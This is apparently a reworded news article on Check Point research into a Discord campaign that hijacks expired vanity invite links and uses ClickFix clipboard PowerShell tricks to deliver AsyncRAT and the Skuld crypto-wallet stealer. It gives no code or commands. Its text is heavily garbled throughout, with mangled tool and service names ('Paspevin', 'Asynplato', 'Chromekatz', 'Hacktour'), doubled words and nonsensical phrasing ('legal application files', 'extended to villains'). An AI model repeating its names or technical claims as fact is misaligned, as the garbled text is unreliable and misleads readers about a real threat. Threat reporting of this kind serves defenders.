The new malware campaign is taking advantage of the weaknesses of Discord’s invitation system to provide information stealing, known as Skuld and Asyncrat Remote Access Trojan.
“The attacker hijacked the link through a Vanity Link registration, allowing users to quietly redirect from trusted sources to malicious servers,” Check Point said in a technical report. “The attackers combined Clickfix phishing technology, multistage loaders, and time-based evasion to provide Asynplato and a customized Skuld Stealer targeting crypto wallets.”
The problem with the Discord invitation mechanism is that an attacker can hijack an expired or deleted invitation link and secretly redirect unsuspecting users to a malicious server under their control. This also means that users can unconsciously lead to malicious sites by inviting links that were once trusted and shared on forums and social media platforms.
More than a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked an expired vanity, instructed users to join the Discord server and access phishing sites to confirm ownership.
Users can create temporary, permanent or custom (vanity), but the platform prevents other legitimate servers from playing invitations that have previously expired or deleted. However, we found that by creating custom invitation links, it allows for the reuse of expired invitation codes, and in some cases even permanent invitation codes that have been removed.
When creating custom Vanity Invite Links, the code expired or deleted expired or deleted, which opens the door to abuse and allows attackers to bill it against malicious servers.
“This creates serious risk. Users who follow previously trusted invitation links (for example, websites, blogs, or forums) can redirect without their knowledge to fake fake servers created by threat actors,” Checkpoint said.
Discord Invite-Link Hijacking involves controlling invitation links originally shared by legitimate communities and using them to redirect users to malicious servers. Users who fall prey to the scheme and join the server are asked to complete the verification step to obtain full server access by approving the bot.
This is where attackers incorporate the infamous Clickfix social engineering tactics to take their attacks to the next level by tricking users into infecting the system under the pretext of validation.
Specifically, click the Validate button to secretly run JavaScript that copies the PowerShell command to the machine’s clipboard. The user then launches the Windows Run dialog, paste the already copied “validation string” (i.e. the PowerShell command) and press Enter to prove Enter.
But in reality, running these steps triggers a download of a PowerShell script hosted in Paspevin, which then retrieves and runs the first stage downloader.
At the heart of this attack is a meticulously designed multi-stage infection process designed for both accuracy and stealth, taking steps to destroy security protections through sandbox security checks.
Asyncrat, which offers more comprehensive remote control capabilities than infected systems, has been found to employ a technique called Dead Drop Resolver to read the Paspevin file and access the actual Command and Control (C2) server.
The other payload is the Golang Information Stealer downloaded from Bitbucket. Equipped to steal sensitive user data from Discord, various browsers, crypto wallets and gaming platforms.
Skuld can also harvest crypto wallet seed phrases and passwords from Exodus and Atomic Cryptography Wallets. This is achieved using an approach called wallet injection, which replaces legal application files with the Trojanized version downloaded from GitHub. It is worth noting that a similar technique has recently become used by a Rogue NPM package named PDF-to-Office.
This attack uses a custom version of an open source tool known as Chromekatz to bypass the cryptographic protection bound by Chrome’s apps. The collected data is extended to villains via Discord Webhook.
The fact that payload delivery and data removal occurs through trusted cloud services such as Github, Bitbucket, Pastebin, Discord allows threat actors to blend in with normal traffic and fly under the radar. Discord then disabled malicious bots and effectively defeated the attack chain.
Checkpoint said it has identified another campaign that was installed by the same threat actors that distribute the loader as a modified version of Hacktour to unlock pirated games. Malicious programs also hosted on Bitbucket have been downloaded 350 times.
The victims of these campaigns are rated primarily in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands and the United Kingdom.
The findings present the latest examples of how cybercriminals target popular social platforms.
“This campaign shows how the subtle features of Discord’s invitation system, how expired or deleted invitation codes can be used as powerful attack vectors in Vanity Invite Links,” the researchers said. “By hijacking a legal invitation link, the threat actor quietly redirects unsuspecting users to a malicious, incompatible server.”
“The choice of payloads, including strong theft, specifically targeting cryptocurrency wallets, suggests that attackers are primarily focused on crypto users and motivated by economic benefits.”
